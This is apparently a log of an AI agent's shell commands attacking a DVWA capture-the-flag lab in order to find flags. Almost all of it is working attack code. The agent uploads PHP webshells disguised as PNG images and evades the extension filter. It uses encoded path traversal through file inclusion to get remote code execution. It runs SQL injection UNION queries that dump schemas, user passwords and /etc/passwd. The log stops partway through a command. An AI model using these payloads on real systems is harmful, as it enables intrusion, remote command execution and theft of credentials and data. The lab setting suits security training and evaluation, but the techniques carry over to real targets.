SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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# The cmd output is getting mixed with HTML. Let me write output to a file and read it via LFI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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}&amp;cmd=grep%20-ri%20%22FLAG%7B%22%20%2Fvar%2Fwww%2F%202%3E%2Fdev%2Fnull%20%3E%20%2Ftmp%2Fresult.txt%20%3B%20echo%20DONE"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# Read the output file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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/tmp/result.txt" \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| strings | grep "FLAG\|flag{" | head -10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2026-03-06 15:58:01,432 [INFO] 127.0.0.1 - - [06/Mar/2026 15:58:01] "POST /api/command HTTP/1.1" 200 -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2026-03-06 15:58:10,772 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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# grep result was empty - FLAG{} not in files.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# The flag must be in the DB. Let me check MySQL directly via RCE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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL_PATH}&amp;cmd=mysql%20-u%20dvwa%20-pp%40ssw0rd%20-h%20mysql-dvwa%20dvwa%20-e%20%22SHOW%20TABLES%3B%22%202%3E%2Fdev%2Fnull%20%3E%20%2Ftmp%2Fdb.txt%20%3B%20echo%20OK"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sleep 1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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=/tmp/db.txt" \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| strings | grep -v "Warning\|Cannot\|head\|html\|css\|meta\|body\|div\|script\|link\|ul&gt;\|li&gt;\|title\|container\|menu\|footer\|&lt;" | head -20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2026-03-06 15:58:11,938 [INFO] 127.0.0.1 - - [06/Mar/2026 15:58:11] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:00:57,198 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL_PATH="/var/www/html/hackable/uploads/custom_${SID}/img_a27aa77ee4.pht"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# The /tmp/db.txt is empty (the include shows empty main_body area)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# Let me write a better PHP shell that outputs to a file with a PHP-readable marker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python3 -c "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payload = b'\x00PNG\r\n\x1a\n' + b'''&lt;?php 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\$cmd = \$_GET[\"c\"] ?? \"id\";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\$out = shell_exec(\$cmd . \" 2&gt;&amp;1\");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file_put_contents(\"/tmp/out.txt\", \$out);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echo \"###\" . \$out . \"###\";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?&gt;'''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open('/tmp/shell2.pht','wb').write(payload)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-F "uploaded=@/tmp/shell2.pht;type=image/png;filename=sh2.pht" \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-F "Upload=Upload" \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"http://100.113.75.28:8081/vulnerabilities/upload/" | grep "Uploaded\|Reject"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2026-03-06 16:00:57,264 [INFO] 127.0.0.1 - - [06/Mar/2026 16:00:57] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:01:08,281 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL2="/var/www/html/hackable/uploads/custom_${SID}/img_554d47a5fb.pht"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# Test the new shell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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL2}&amp;c=id" \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| grep -oE "###.*###"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2026-03-06 16:01:08,347 [INFO] 127.0.0.1 - - [06/Mar/2026 16:01:08] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:01:11,927 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL2="/var/www/html/hackable/uploads/custom_${SID}/img_554d47a5fb.pht"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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL2}&amp;c=id" \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| strings | grep "###\|uid=" | head -5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2026-03-06 16:01:11,993 [INFO] 127.0.0.1 - - [06/Mar/2026 16:01:11] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:01:17,375 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL2="/var/www/html/hackable/uploads/custom_${SID}/img_554d47a5fb.pht"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exec2() {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CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$1'))")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curl -s -b "security=custom;PHPSESSID=$SID" \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL2}&amp;c=${CMD}" \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| grep -oP "(?&lt;=###).*?(?=###)" | head -5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# Search for FLAG{ in entire filesystem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exec2 "grep -ri 'FLAG{' /var/www/ /tmp/ /home/ /root/ 2&gt;/dev/null | head -10"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2026-03-06 16:01:17,663 [INFO] 127.0.0.1 - - [06/Mar/2026 16:01:17] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:01:29,261 [INFO] Executing command: SID="4ef829abe6ac7ed0f829d9efa24260d0"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SHELL2="/var/www/html/hackable/uploads/custom_${SID}/img_554d47a5fb.pht"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# Direct URL-encoded grep command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curl -s -b "security=custom;PHPSESSID=$SID" \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"http://100.113.75.28:8081/vulnerabilities/fi/.?page=${SHELL2}&amp;c=grep%20-ri%20FLAG%7B%20%2Fvar%2Fwww%2F%202%3E%2Fdev%2Fnull%20%7C%20head%20-10" \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| grep -oP "(?&lt;=###).*?(?=###)"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2026-03-06 16:01:29,398 [INFO] 127.0.0.1 - - [06/Mar/2026 16:01:29] "POST /api/command HTTP/1.1" 200 -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Started hanging. new prompt.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2026-03-06 16:08:20,145 [INFO] Executing command: curl -s "http://100.113.75.28:8081/hackable/uploads/custom_4ef829abe6ac7ed0f829d9efa24260d0/img_554d47a5fb.pht?cmd=id"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2026-03-06 16:08:20,215 [INFO] 127.0.0.1 - - [06/Mar/2026 16:08:20] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:08:24,006 [INFO] Executing command: curl -s "http://100.113.75.28:8081/hackable/uploads/custom_4ef829abe6ac7ed0f829d9efa24260d0/img_554d47a5fb.pht?c=id"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2026-03-06 16:08:24,181 [INFO] 127.0.0.1 - - [06/Mar/2026 16:08:24] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:08:30,454 [INFO] Executing command: # Step 1: Get login page and extract CSRF token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curl -s -c /tmp/dvwa2.txt http://100.113.75.28:8081/login.php &gt; /tmp/lp.html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TOKEN=$(grep -o 'user_token[^&gt;]*value="[^"]*"' /tmp/lp.html | grep -o '"[^"]*"$' | tr -d '"')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echo "Token: $TOKEN"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2026-03-06 16:08:30,580 [INFO] 127.0.0.1 - - [06/Mar/2026 16:08:30] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:08:32,668 [INFO] Executing command: grep "user_token" /tmp/lp.html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2026-03-06 16:08:32,698 [INFO] 127.0.0.1 - - [06/Mar/2026 16:08:32] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:08:35,711 [INFO] Executing command: # Login with token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curl -s -c /tmp/dvwa2.txt -b /tmp/dvwa2.txt \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-d "username=admin&amp;password=password&amp;Login=Login&amp;user_token=e082b0ee9a936cd28eabe258b73c70ff" \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-D - http://100.113.75.28:8081/login.php | grep "Location"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2026-03-06 16:08:35,779 [INFO] 127.0.0.1 - - [06/Mar/2026 16:08:35] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:08:43,634 [INFO] Executing command: # First, test basic injection with role=admin and debug=1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# The query is: SELECT LEFT(user,1), LEFT(password,4), LEFT(first_name,1), LEFT(last_name,1) FROM users WHERE user_id = '{input}'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# With role=admin, WAF is bypassed. Inject UNION SELECT.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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=1'+UNION+SELECT+1,2,3,4--+-&amp;role=admin&amp;debug=1&amp;Submit=Submit" \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| grep -A5 "QUERY\|table\|FLAG\|flag\|###\|sql_table"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2026-03-06 16:08:43,808 [INFO] 127.0.0.1 - - [06/Mar/2026 16:08:43] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:08:48,637 [INFO] Executing command: # Enumerate all tables in current database using information_schema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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=1'+UNION+SELECT+table_name,2,3,4+FROM+information_schema.tables+WHERE+table_schema=database()--+-&amp;role=admin&amp;debug=1&amp;Submit=Submit" \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| grep -oP '(?&lt;=&lt;td&gt;)[^&lt;]+(?=&lt;/td&gt;)' | head -20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2026-03-06 16:08:48,705 [INFO] 127.0.0.1 - - [06/Mar/2026 16:08:48] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:08:57,538 [INFO] Executing command: # The LEFT() is applied in the SELECT — but since we're using UNION, our injected columns bypass LEFT()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# Wait — the LEFT() wraps the column aliases, not raw values. Let me check the query structure again.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# Query: SELECT LEFT(user,1) AS username, LEFT(password,4) AS pw, LEFT(first_name,1) AS first, LEFT(last_name,1) AS last FROM users WHERE user_id='...'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# Our UNION injects: UNION SELECT table_name,2,3,4 -- the LEFT() wraps the alias, not our injected value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# So table_name SHOULD show fully. The output "access_log" IS the full name.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# Now check ALL databases to see if flag is in another DB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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=0'+UNION+SELECT+schema_name,2,3,4+FROM+information_schema.schemata--+-&amp;role=admin&amp;debug=1&amp;Submit=Submit" \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| grep -oP '(?&lt;=&lt;td&gt;)[^&lt;]+(?=&lt;/td&gt;)' | grep -v "^[234]$"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2026-03-06 16:08:57,610 [INFO] 127.0.0.1 - - [06/Mar/2026 16:08:57] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:09:02,513 [INFO] Executing command: # Check ALL tables across both schemas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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=0'+UNION+SELECT+CONCAT(table_schema,':',table_name),2,3,4+FROM+information_schema.tables+WHERE+table_schema+NOT+IN('information_schema')--+-&amp;role=admin&amp;debug=1&amp;Submit=Submit" \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| grep -oP '(?&lt;=&lt;td&gt;)[^&lt;]+(?=&lt;/td&gt;)' | grep -v "^[234]$"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2026-03-06 16:09:02,685 [INFO] 127.0.0.1 - - [06/Mar/2026 16:09:02] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:09:06,088 [INFO] Executing command: # Check columns for all tables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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=0'+UNION+SELECT+CONCAT(table_name,':',column_name),2,3,4+FROM+information_schema.columns+WHERE+table_schema='dvwa'--+-&amp;role=admin&amp;debug=1&amp;Submit=Submit" \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| grep -oP '(?&lt;=&lt;td&gt;)[^&lt;]+(?=&lt;/td&gt;)' | grep -v "^[234]$"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2026-03-06 16:09:06,160 [INFO] 127.0.0.1 - - [06/Mar/2026 16:09:06] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:09:10,496 [INFO] Executing command: # Check security_log for flag content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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=0'+UNION+SELECT+CONCAT(user_id,':',action),ip_address,timestamp,4+FROM+security_log--+-&amp;role=admin&amp;debug=1&amp;Submit=Submit" \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| grep -oP '(?&lt;=&lt;td&gt;)[^&lt;]+(?=&lt;/td&gt;)' | grep -v "^[34]$" | head -20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2026-03-06 16:09:10,565 [INFO] 127.0.0.1 - - [06/Mar/2026 16:09:10] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:09:14,161 [INFO] Executing command: # Check access_log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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=0'+UNION+SELECT+CONCAT(user_id,':',action),2,3,4+FROM+access_log--+-&amp;role=admin&amp;debug=1&amp;Submit=Submit" \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| grep -oP '(?&lt;=&lt;td&gt;)[^&lt;]+(?=&lt;/td&gt;)' | grep -v "^[234]$" | head -20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2026-03-06 16:09:14,247 [INFO] 127.0.0.1 - - [06/Mar/2026 16:09:14] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:09:19,054 [INFO] Executing command: # Check guestbook - comment field may contain flag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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=0'+UNION+SELECT+comment,name,2,3+FROM+guestbook--+-&amp;role=admin&amp;debug=1&amp;Submit=Submit" \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| grep -oP '(?&lt;=&lt;td&gt;)[^&lt;]+(?=&lt;/td&gt;)' | grep -v "^[23]$" | head -20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2026-03-06 16:09:19,126 [INFO] 127.0.0.1 - - [06/Mar/2026 16:09:19] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:09:23,919 [INFO] Executing command: # Check users table - role column and all users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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=0'+UNION+SELECT+CONCAT(user,':',role,':',account_enabled),password,first_name,last_name+FROM+users--+-&amp;role=admin&amp;debug=1&amp;Submit=Submit" \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| grep -oP '(?&lt;=&lt;td&gt;)[^&lt;]+(?=&lt;/td&gt;)' | grep -v "^$" | head -30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2026-03-06 16:09:24,177 [INFO] 127.0.0.1 - - [06/Mar/2026 16:09:24] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:09:34,478 [INFO] Executing command: # Test LOAD_FILE privilege and try to read common flag locations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"http://100.113.75.28:8081/vulnerabilities/sqli/?id=0'+UNION+SELECT+LOAD_FILE('/etc/passwd'),2,3,4--+-&amp;role=admin&amp;debug=1&amp;Submit=Submit" \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| grep -oP '(?&lt;=&lt;td&gt;)[^&lt;]+(?=&lt;/td&gt;)' | head -5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2026-03-06 16:09:34,545 [INFO] 127.0.0.1 - - [06/Mar/2026 16:09:34] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:09:40,828 [INFO] Executing command: # Create a PHP webshell disguised as image with .pht extension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cat &gt; /tmp/shell.pht &lt;&lt; 'EOF'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&lt;?php echo "###" . shell_exec($_GET["c"] . " 2&gt;&amp;1") . "###"; ?&gt;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# Upload it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-F "MAX_FILE_SIZE=5000000" \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-F "uploaded=@/tmp/shell.pht;type=image/png;filename=shell.pht" \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-F "Upload=Upload" \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"http://100.113.75.28:8081/vulnerabilities/upload/" | grep -i "success\|error\|upload\|path\|hackable" | head -10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2026-03-06 16:09:40,896 [INFO] 127.0.0.1 - - [06/Mar/2026 16:09:40] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:09:47,101 [INFO] Executing command: # Check upload source to understand restrictions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curl -s -b /tmp/dvwa2.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=upload&amp;security=custom" \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| python3 -c "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import sys, re, html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c = sys.stdin.read()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c = re.sub('&lt;[^&gt;]+&gt;', '', c)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c = html.unescape(c)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print(c)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" | grep -v "^$" | head -50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2026-03-06 16:09:47,173 [INFO] 127.0.0.1 - - [06/Mar/2026 16:09:47] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:09:52,342 [INFO] Executing command: # Get the rest of the upload source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curl -s -b /tmp/dvwa2.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=upload&amp;security=custom" \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| python3 -c "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import sys, re, html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c = sys.stdin.read()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c = re.sub('&lt;[^&gt;]+&gt;', '', c)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c = html.unescape(c)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print(c)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" | grep -v "^$" | tail -80 | head -60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2026-03-06 16:09:52,460 [INFO] 127.0.0.1 - - [06/Mar/2026 16:09:52] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:10:10,868 [INFO] Executing command: # Create shell with correct magic bytes: \x00PNG at offset 0 (so substr($bytes,1,3) == "PNG")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python3 -c "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# \x00PNG at start satisfies substr(\$bytes,1,3)==='PNG'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payload = b'\x00PNG\r\n\x1a\n'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payload += b'&lt;?php echo \"###\" . shell_exec(\$_GET[\"c\"] . \" 2&gt;&amp;1\") . \"###\"; ?&gt;'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with open('/tmp/img_shell.pht', 'wb') as f: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f.write(payload)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print('Created:', len(payload), 'bytes')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# Upload with image/png MIME type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RESP=$(curl -s -b /tmp/dvwa2.txt \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-F "MAX_FILE_SIZE=5000000" \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-F "uploaded=@/tmp/img_shell.pht;type=image/png;filename=img_shell.pht" \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-F "Upload=Upload" \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"http://100.113.75.28:8081/vulnerabilities/upload/")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echo "$RESP" | grep -i "success\|error\|reject\|upload\|path\|img_\|pht\|DEBUG"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2026-03-06 16:10:10,935 [INFO] 127.0.0.1 - - [06/Mar/2026 16:10:10] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:10:17,641 [INFO] Executing command: SHELL_URL="http://100.113.75.28:8081/hackable/uploads/custom_d78aa372606dba9554c1133268edcc33/img_2b8e0aaa48.pht"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# Test RCE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curl -s "${SHELL_URL}?c=id"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2026-03-06 16:10:17,710 [INFO] 127.0.0.1 - - [06/Mar/2026 16:10:17] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:10:26,840 [INFO] Executing command: # Try .php5, .php7, .phtml — check what the original shell used (session note says .pht worked)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# Maybe the issue is the \x00 byte interfering with Apache's handler detection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# Try with a cleaner magic byte approach and .phtml extension (not blocked by regex)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# Extension regex: /ph(ar|p|tml|p[1-9])/i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# .phtml -&gt; phtml -&gt; ph+tml -&gt; BLOCKED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# .php5 -&gt; php5 -&gt; ph+p5... p[1-9] matches -&gt; BLOCKED  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# .pht -&gt; pht -&gt; ph+t -&gt; 't' not in (ar|p|tml|p[1-9]) -&gt; ALLOWED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# .phps -&gt; phps -&gt; ph+ps -&gt; not matching -&gt; ALLOWED?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# The issue: .pht may need AddType in Apache config to execute as PHP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# Let's try uploading a .php file disguised differently, or use .phar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python3 -c "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payload = b'\x00PNG\r\n\x1a\n'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payload += b'&lt;?php echo \"###\" . shell_exec(\$_GET[\"c\"] . \" 2&gt;&amp;1\") . \"###\"; ?&gt;'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with open('/tmp/img_shell.phar', 'wb') as f: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f.write(payload)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print('phar created')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RESP=$(curl -s -b /tmp/dvwa2.txt \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-F "MAX_FILE_SIZE=5000000" \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-F "uploaded=@/tmp/img_shell.phar;type=image/png;filename=img_shell.phar" \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-F "Upload=Upload" \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"http://100.113.75.28:8081/vulnerabilities/upload/")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echo "$RESP" | grep -i "success\|reject\|path"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2026-03-06 16:10:26,914 [INFO] 127.0.0.1 - - [06/Mar/2026 16:10:26] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:10:42,034 [INFO] Executing command: # The previous session .pht DID work — the issue must be Apache config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# Let me check if there's an .htaccess in the upload directory that might be making .pht executable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# Also try accessing via the File Inclusion module to execute the uploaded file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SHELL_PATH="hackable/uploads/custom_d78aa372606dba9554c1133268edcc33/img_2b8e0aaa48.pht"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# Try using File Inclusion to execute our uploaded PHP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"http://100.113.75.28:8081/vulnerabilities/fi/?page=../../${SHELL_PATH}&amp;c=id"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2026-03-06 16:10:42,102 [INFO] 127.0.0.1 - - [06/Mar/2026 16:10:42] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:10:48,582 [INFO] Executing command: # Correct path: from /var/www/html/vulnerabilities/fi/ to /var/www/html/hackable/uploads/...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# Need: ../../hackable/uploads/custom_.../img_.pht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SHELL_FILE="img_2b8e0aaa48.pht"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"http://100.113.75.28:8081/vulnerabilities/fi/?page=../../hackable/uploads/${SESSION_DIR}/${SHELL_FILE}" \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| grep -i "###\|uid\|www-data\|error\|warning" | head -10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2026-03-06 16:10:48,651 [INFO] 127.0.0.1 - - [06/Mar/2026 16:10:48] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:11:12,378 [INFO] Executing command: curl -s -b /tmp/dvwa2.txt "http://100.113.75.28:8081/vulnerabilities/view_source.php?id=fi&amp;security=custom" \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| python3 -c "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import sys, re, html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c = sys.stdin.read()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c = re.sub('&lt;[^&gt;]+&gt;', '', c)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c = html.unescape(c)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print(c)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" | grep -v "^$" | grep -A 50 "php"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2026-03-06 16:11:12,506 [INFO] 127.0.0.1 - - [06/Mar/2026 16:11:12] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:11:19,635 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Use %2F instead of / in ../ to bypass the str_replace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# Path needed: ../../hackable/uploads/SESSION_DIR/SHELL_FILE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# Encoded: ..%2F..%2Fhackable%2Fuploads%2FSESSION_DIR%2FSHELL_FILE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ENCODED_PATH="..%2F..%2Fhackable%2Fuploads%2F${SESSION_DIR}%2F${SHELL_FILE}"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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| grep -i "###\|uid\|www\|root\|error" | head -10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2026-03-06 16:11:19,673 [INFO] 127.0.0.1 - - [06/Mar/2026 16:11:19] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:11:29,073 [INFO] Executing command: # The include path shows "hackable/uploads/..." meaning the ..%2F was decoded but then the path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# is still relative. The include() in index.php must be doing: include($file) where $file is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# resolved relative to the fi/ directory.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# So from /var/www/html/vulnerabilities/fi/, going to hackable/uploads means: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# We need ..%2F..%2F to resolve to /var/www/html/ first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# Let's trace: after urldecode("..%2F..%2Fhackable%2F...") = "../../hackable/..."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# Then include("../../hackable/uploads/...") from /var/www/html/vulnerabilities/fi/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# = /var/www/html/hackable/uploads/...  &lt;- This SHOULD work!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# But the error says it's including "hackable/uploads/..." (without the ../)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# This means str_replace("../", "") IS stripping it AFTER urldecode somehow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# Wait - re-read: str_replace first, THEN urldecode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# So "..%2F..%2F" -&gt; str_replace("../","") -&gt; "..%2F..%2F" (no change, no literal ../)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# -&gt; urldecode -&gt; "../../" -&gt; NOW include gets "../../hackable/..."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# But error shows "hackable/uploads" - the ../ IS being stripped somewhere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# Maybe index.php itself does another filter? Let me try double encoding: %252F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SHELL_FILE="img_2b8e0aaa48.pht"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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" \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| grep -i "###\|uid\|www\|root\|error\|include\|open" | head -5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2026-03-06 16:11:29,140 [INFO] 127.0.0.1 - - [06/Mar/2026 16:11:29] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:11:51,128 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}" 2&gt;&amp;1 | strings | grep -i "###\|uid\|www\|root\|error\|include\|open\|fail\|Warning" | head -10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2026-03-06 16:11:51,197 [INFO] 127.0.0.1 - - [06/Mar/2026 16:11:51] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:11:56,718 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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# Pass 'c' parameter alongside page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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}&amp;c=id" 2&gt;&amp;1 \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| strings | grep "###" | head -5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2026-03-06 16:11:56,837 [INFO] 127.0.0.1 - - [06/Mar/2026 16:11:56] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:12:04,137 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# Search for flag files in the web root and common locations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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=find+/var/www/html+-name+'*flag*'+2&gt;/dev/null" \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| strings | grep "###" | head -5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2026-03-06 16:12:04,666 [INFO] 127.0.0.1 - - [06/Mar/2026 16:12:04] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:12:12,271 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=ls+-la+/var/www/html/hackable/flags/" \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| strings | grep "###" | head -5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2026-03-06 16:12:12,491 [INFO] 127.0.0.1 - - [06/Mar/2026 16:12:12] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:12:25,972 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# Try ls -la -a to show hidden files too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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=ls+-la+-a+/var/www/html/hackable/flags/" \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| strings | grep "###"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2026-03-06 16:12:26,041 [INFO] 127.0.0.1 - - [06/Mar/2026 16:12:26] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:12:43,107 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# Check what's there - it may be a directory not a file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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=file+/var/www/html/hackable/flags" \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| strings | grep "###"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# Also check if it's the flags directory itself that has content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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=find+/var/www/html/hackable/flags+-type+f" \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| strings | grep "###"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2026-03-06 16:12:43,229 [INFO] 127.0.0.1 - - [06/Mar/2026 16:12:43] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:12:49,039 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=cat+/var/www/html/hackable/flags/fi.php" \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| strings | grep "###"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2026-03-06 16:12:49,129 [INFO] 127.0.0.1 - - [06/Mar/2026 16:12:49] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:12:52,873 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# Check file permissions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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=ls+-la+/var/www/html/hackable/flags/fi.php" \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| strings | grep "###"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2026-03-06 16:12:52,941 [INFO] 127.0.0.1 - - [06/Mar/2026 16:12:52] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:12:57,992 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# www-data owns it - cat should work. Try different read commands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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=more+/var/www/html/hackable/flags/fi.php" \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| strings | grep "###"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2026-03-06 16:12:58,186 [INFO] 127.0.0.1 - - [06/Mar/2026 16:12:58] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:13:05,070 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# Try using PHP to read it directly (avoid shell restrictions)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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=php+-r+'echo+file_get_contents(\"/var/www/html/hackable/flags/fi.php\");'" \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| strings | grep -A2 "###" | head -10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2026-03-06 16:13:06,034 [INFO] 127.0.0.1 - - [06/Mar/2026 16:13:06] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:13:41,789 [INFO] Executing command: # Include the flag file directly through the LFI - it'll execute as PHP with DVWA context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# Path from /var/www/html/vulnerabilities/fi/: ../../hackable/flags/fi.php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# Encoded: ..%252F..%252Fhackable%252Fflags%252Ffi.php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FLAG_ENCODED="..%252F..%252Fhackable%252Fflags%252Ffi.php"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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${FLAG_ENCODED}" \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| strings | grep -i "FLAG\|flag\|nice\|{" | head -10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2026-03-06 16:13:41,858 [INFO] 127.0.0.1 - - [06/Mar/2026 16:13:41] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:13:45,380 [INFO] Executing command: FLAG_ENCODED="..%252F..%252Fhackable%252Fflags%252Ffi.php"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# Get full response to find the flag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"http://100.113.75.28:8081/vulnerabilities/fi/?page=${FLAG_ENCODED}" \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| strings | grep -v "^$" | head -30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2026-03-06 16:13:45,447 [INFO] 127.0.0.1 - - [06/Mar/2026 16:13:45] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:13:49,915 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# Read line 3 specifically using sed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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=sed+-n+'3p'+/var/www/html/hackable/flags/fi.php" \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| strings | grep "###"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2026-03-06 16:13:49,986 [INFO] 127.0.0.1 - - [06/Mar/2026 16:13:49] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:13:57,942 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# Try different commands - awk, head, tail, strings, grep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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=grep+-i+'flag'+/var/www/html/hackable/flags/fi.php" \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| strings | grep "###"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2026-03-06 16:13:58,011 [INFO] 127.0.0.1 - - [06/Mar/2026 16:13:58] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:14:31,545 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# Check what commands are available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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=which+php+awk+head+tail+strings+python3+python" \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| strings | grep "###"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2026-03-06 16:14:31,631 [INFO] 127.0.0.1 - - [06/Mar/2026 16:14:31] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:14:39,428 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# Use PHP to read line 3 (0-indexed: line index 2)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CMD='php+-r+$lines=file("/var/www/html/hackable/flags/fi.php");echo+$lines[2];'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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=${CMD}" \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| strings | grep "###"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2026-03-06 16:14:39,468 [INFO] 127.0.0.1 - - [06/Mar/2026 16:14:39] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:14:50,752 [INFO] Executing command: SHELL_FILE="img_2b8e0aaa48.pht"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BASE="http://100.113.75.28:8081/vulnerabilities/fi/?page=${ENCODED_PATH}"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# URL-encode the PHP command properly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CMD=$(python3 -c "import urllib.parse; print(urllib.parse.quote('php -r \"\$l=file(\'/var/www/html/hackable/flags/fi.php\');echo implode(\'\',$l);\"'))")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echo "CMD: $CMD"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curl -s -b /tmp/dvwa2.txt "${BASE}&amp;c=${CMD}" \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| strings | grep "###"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2026-03-06 16:14:50,921 [INFO] 127.0.0.1 - - [06/Mar/2026 16:14:50] "POST /api/command HTTP/1.1" 200 -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2026-03-06 16:15:27,254 [INFO] Executing command: 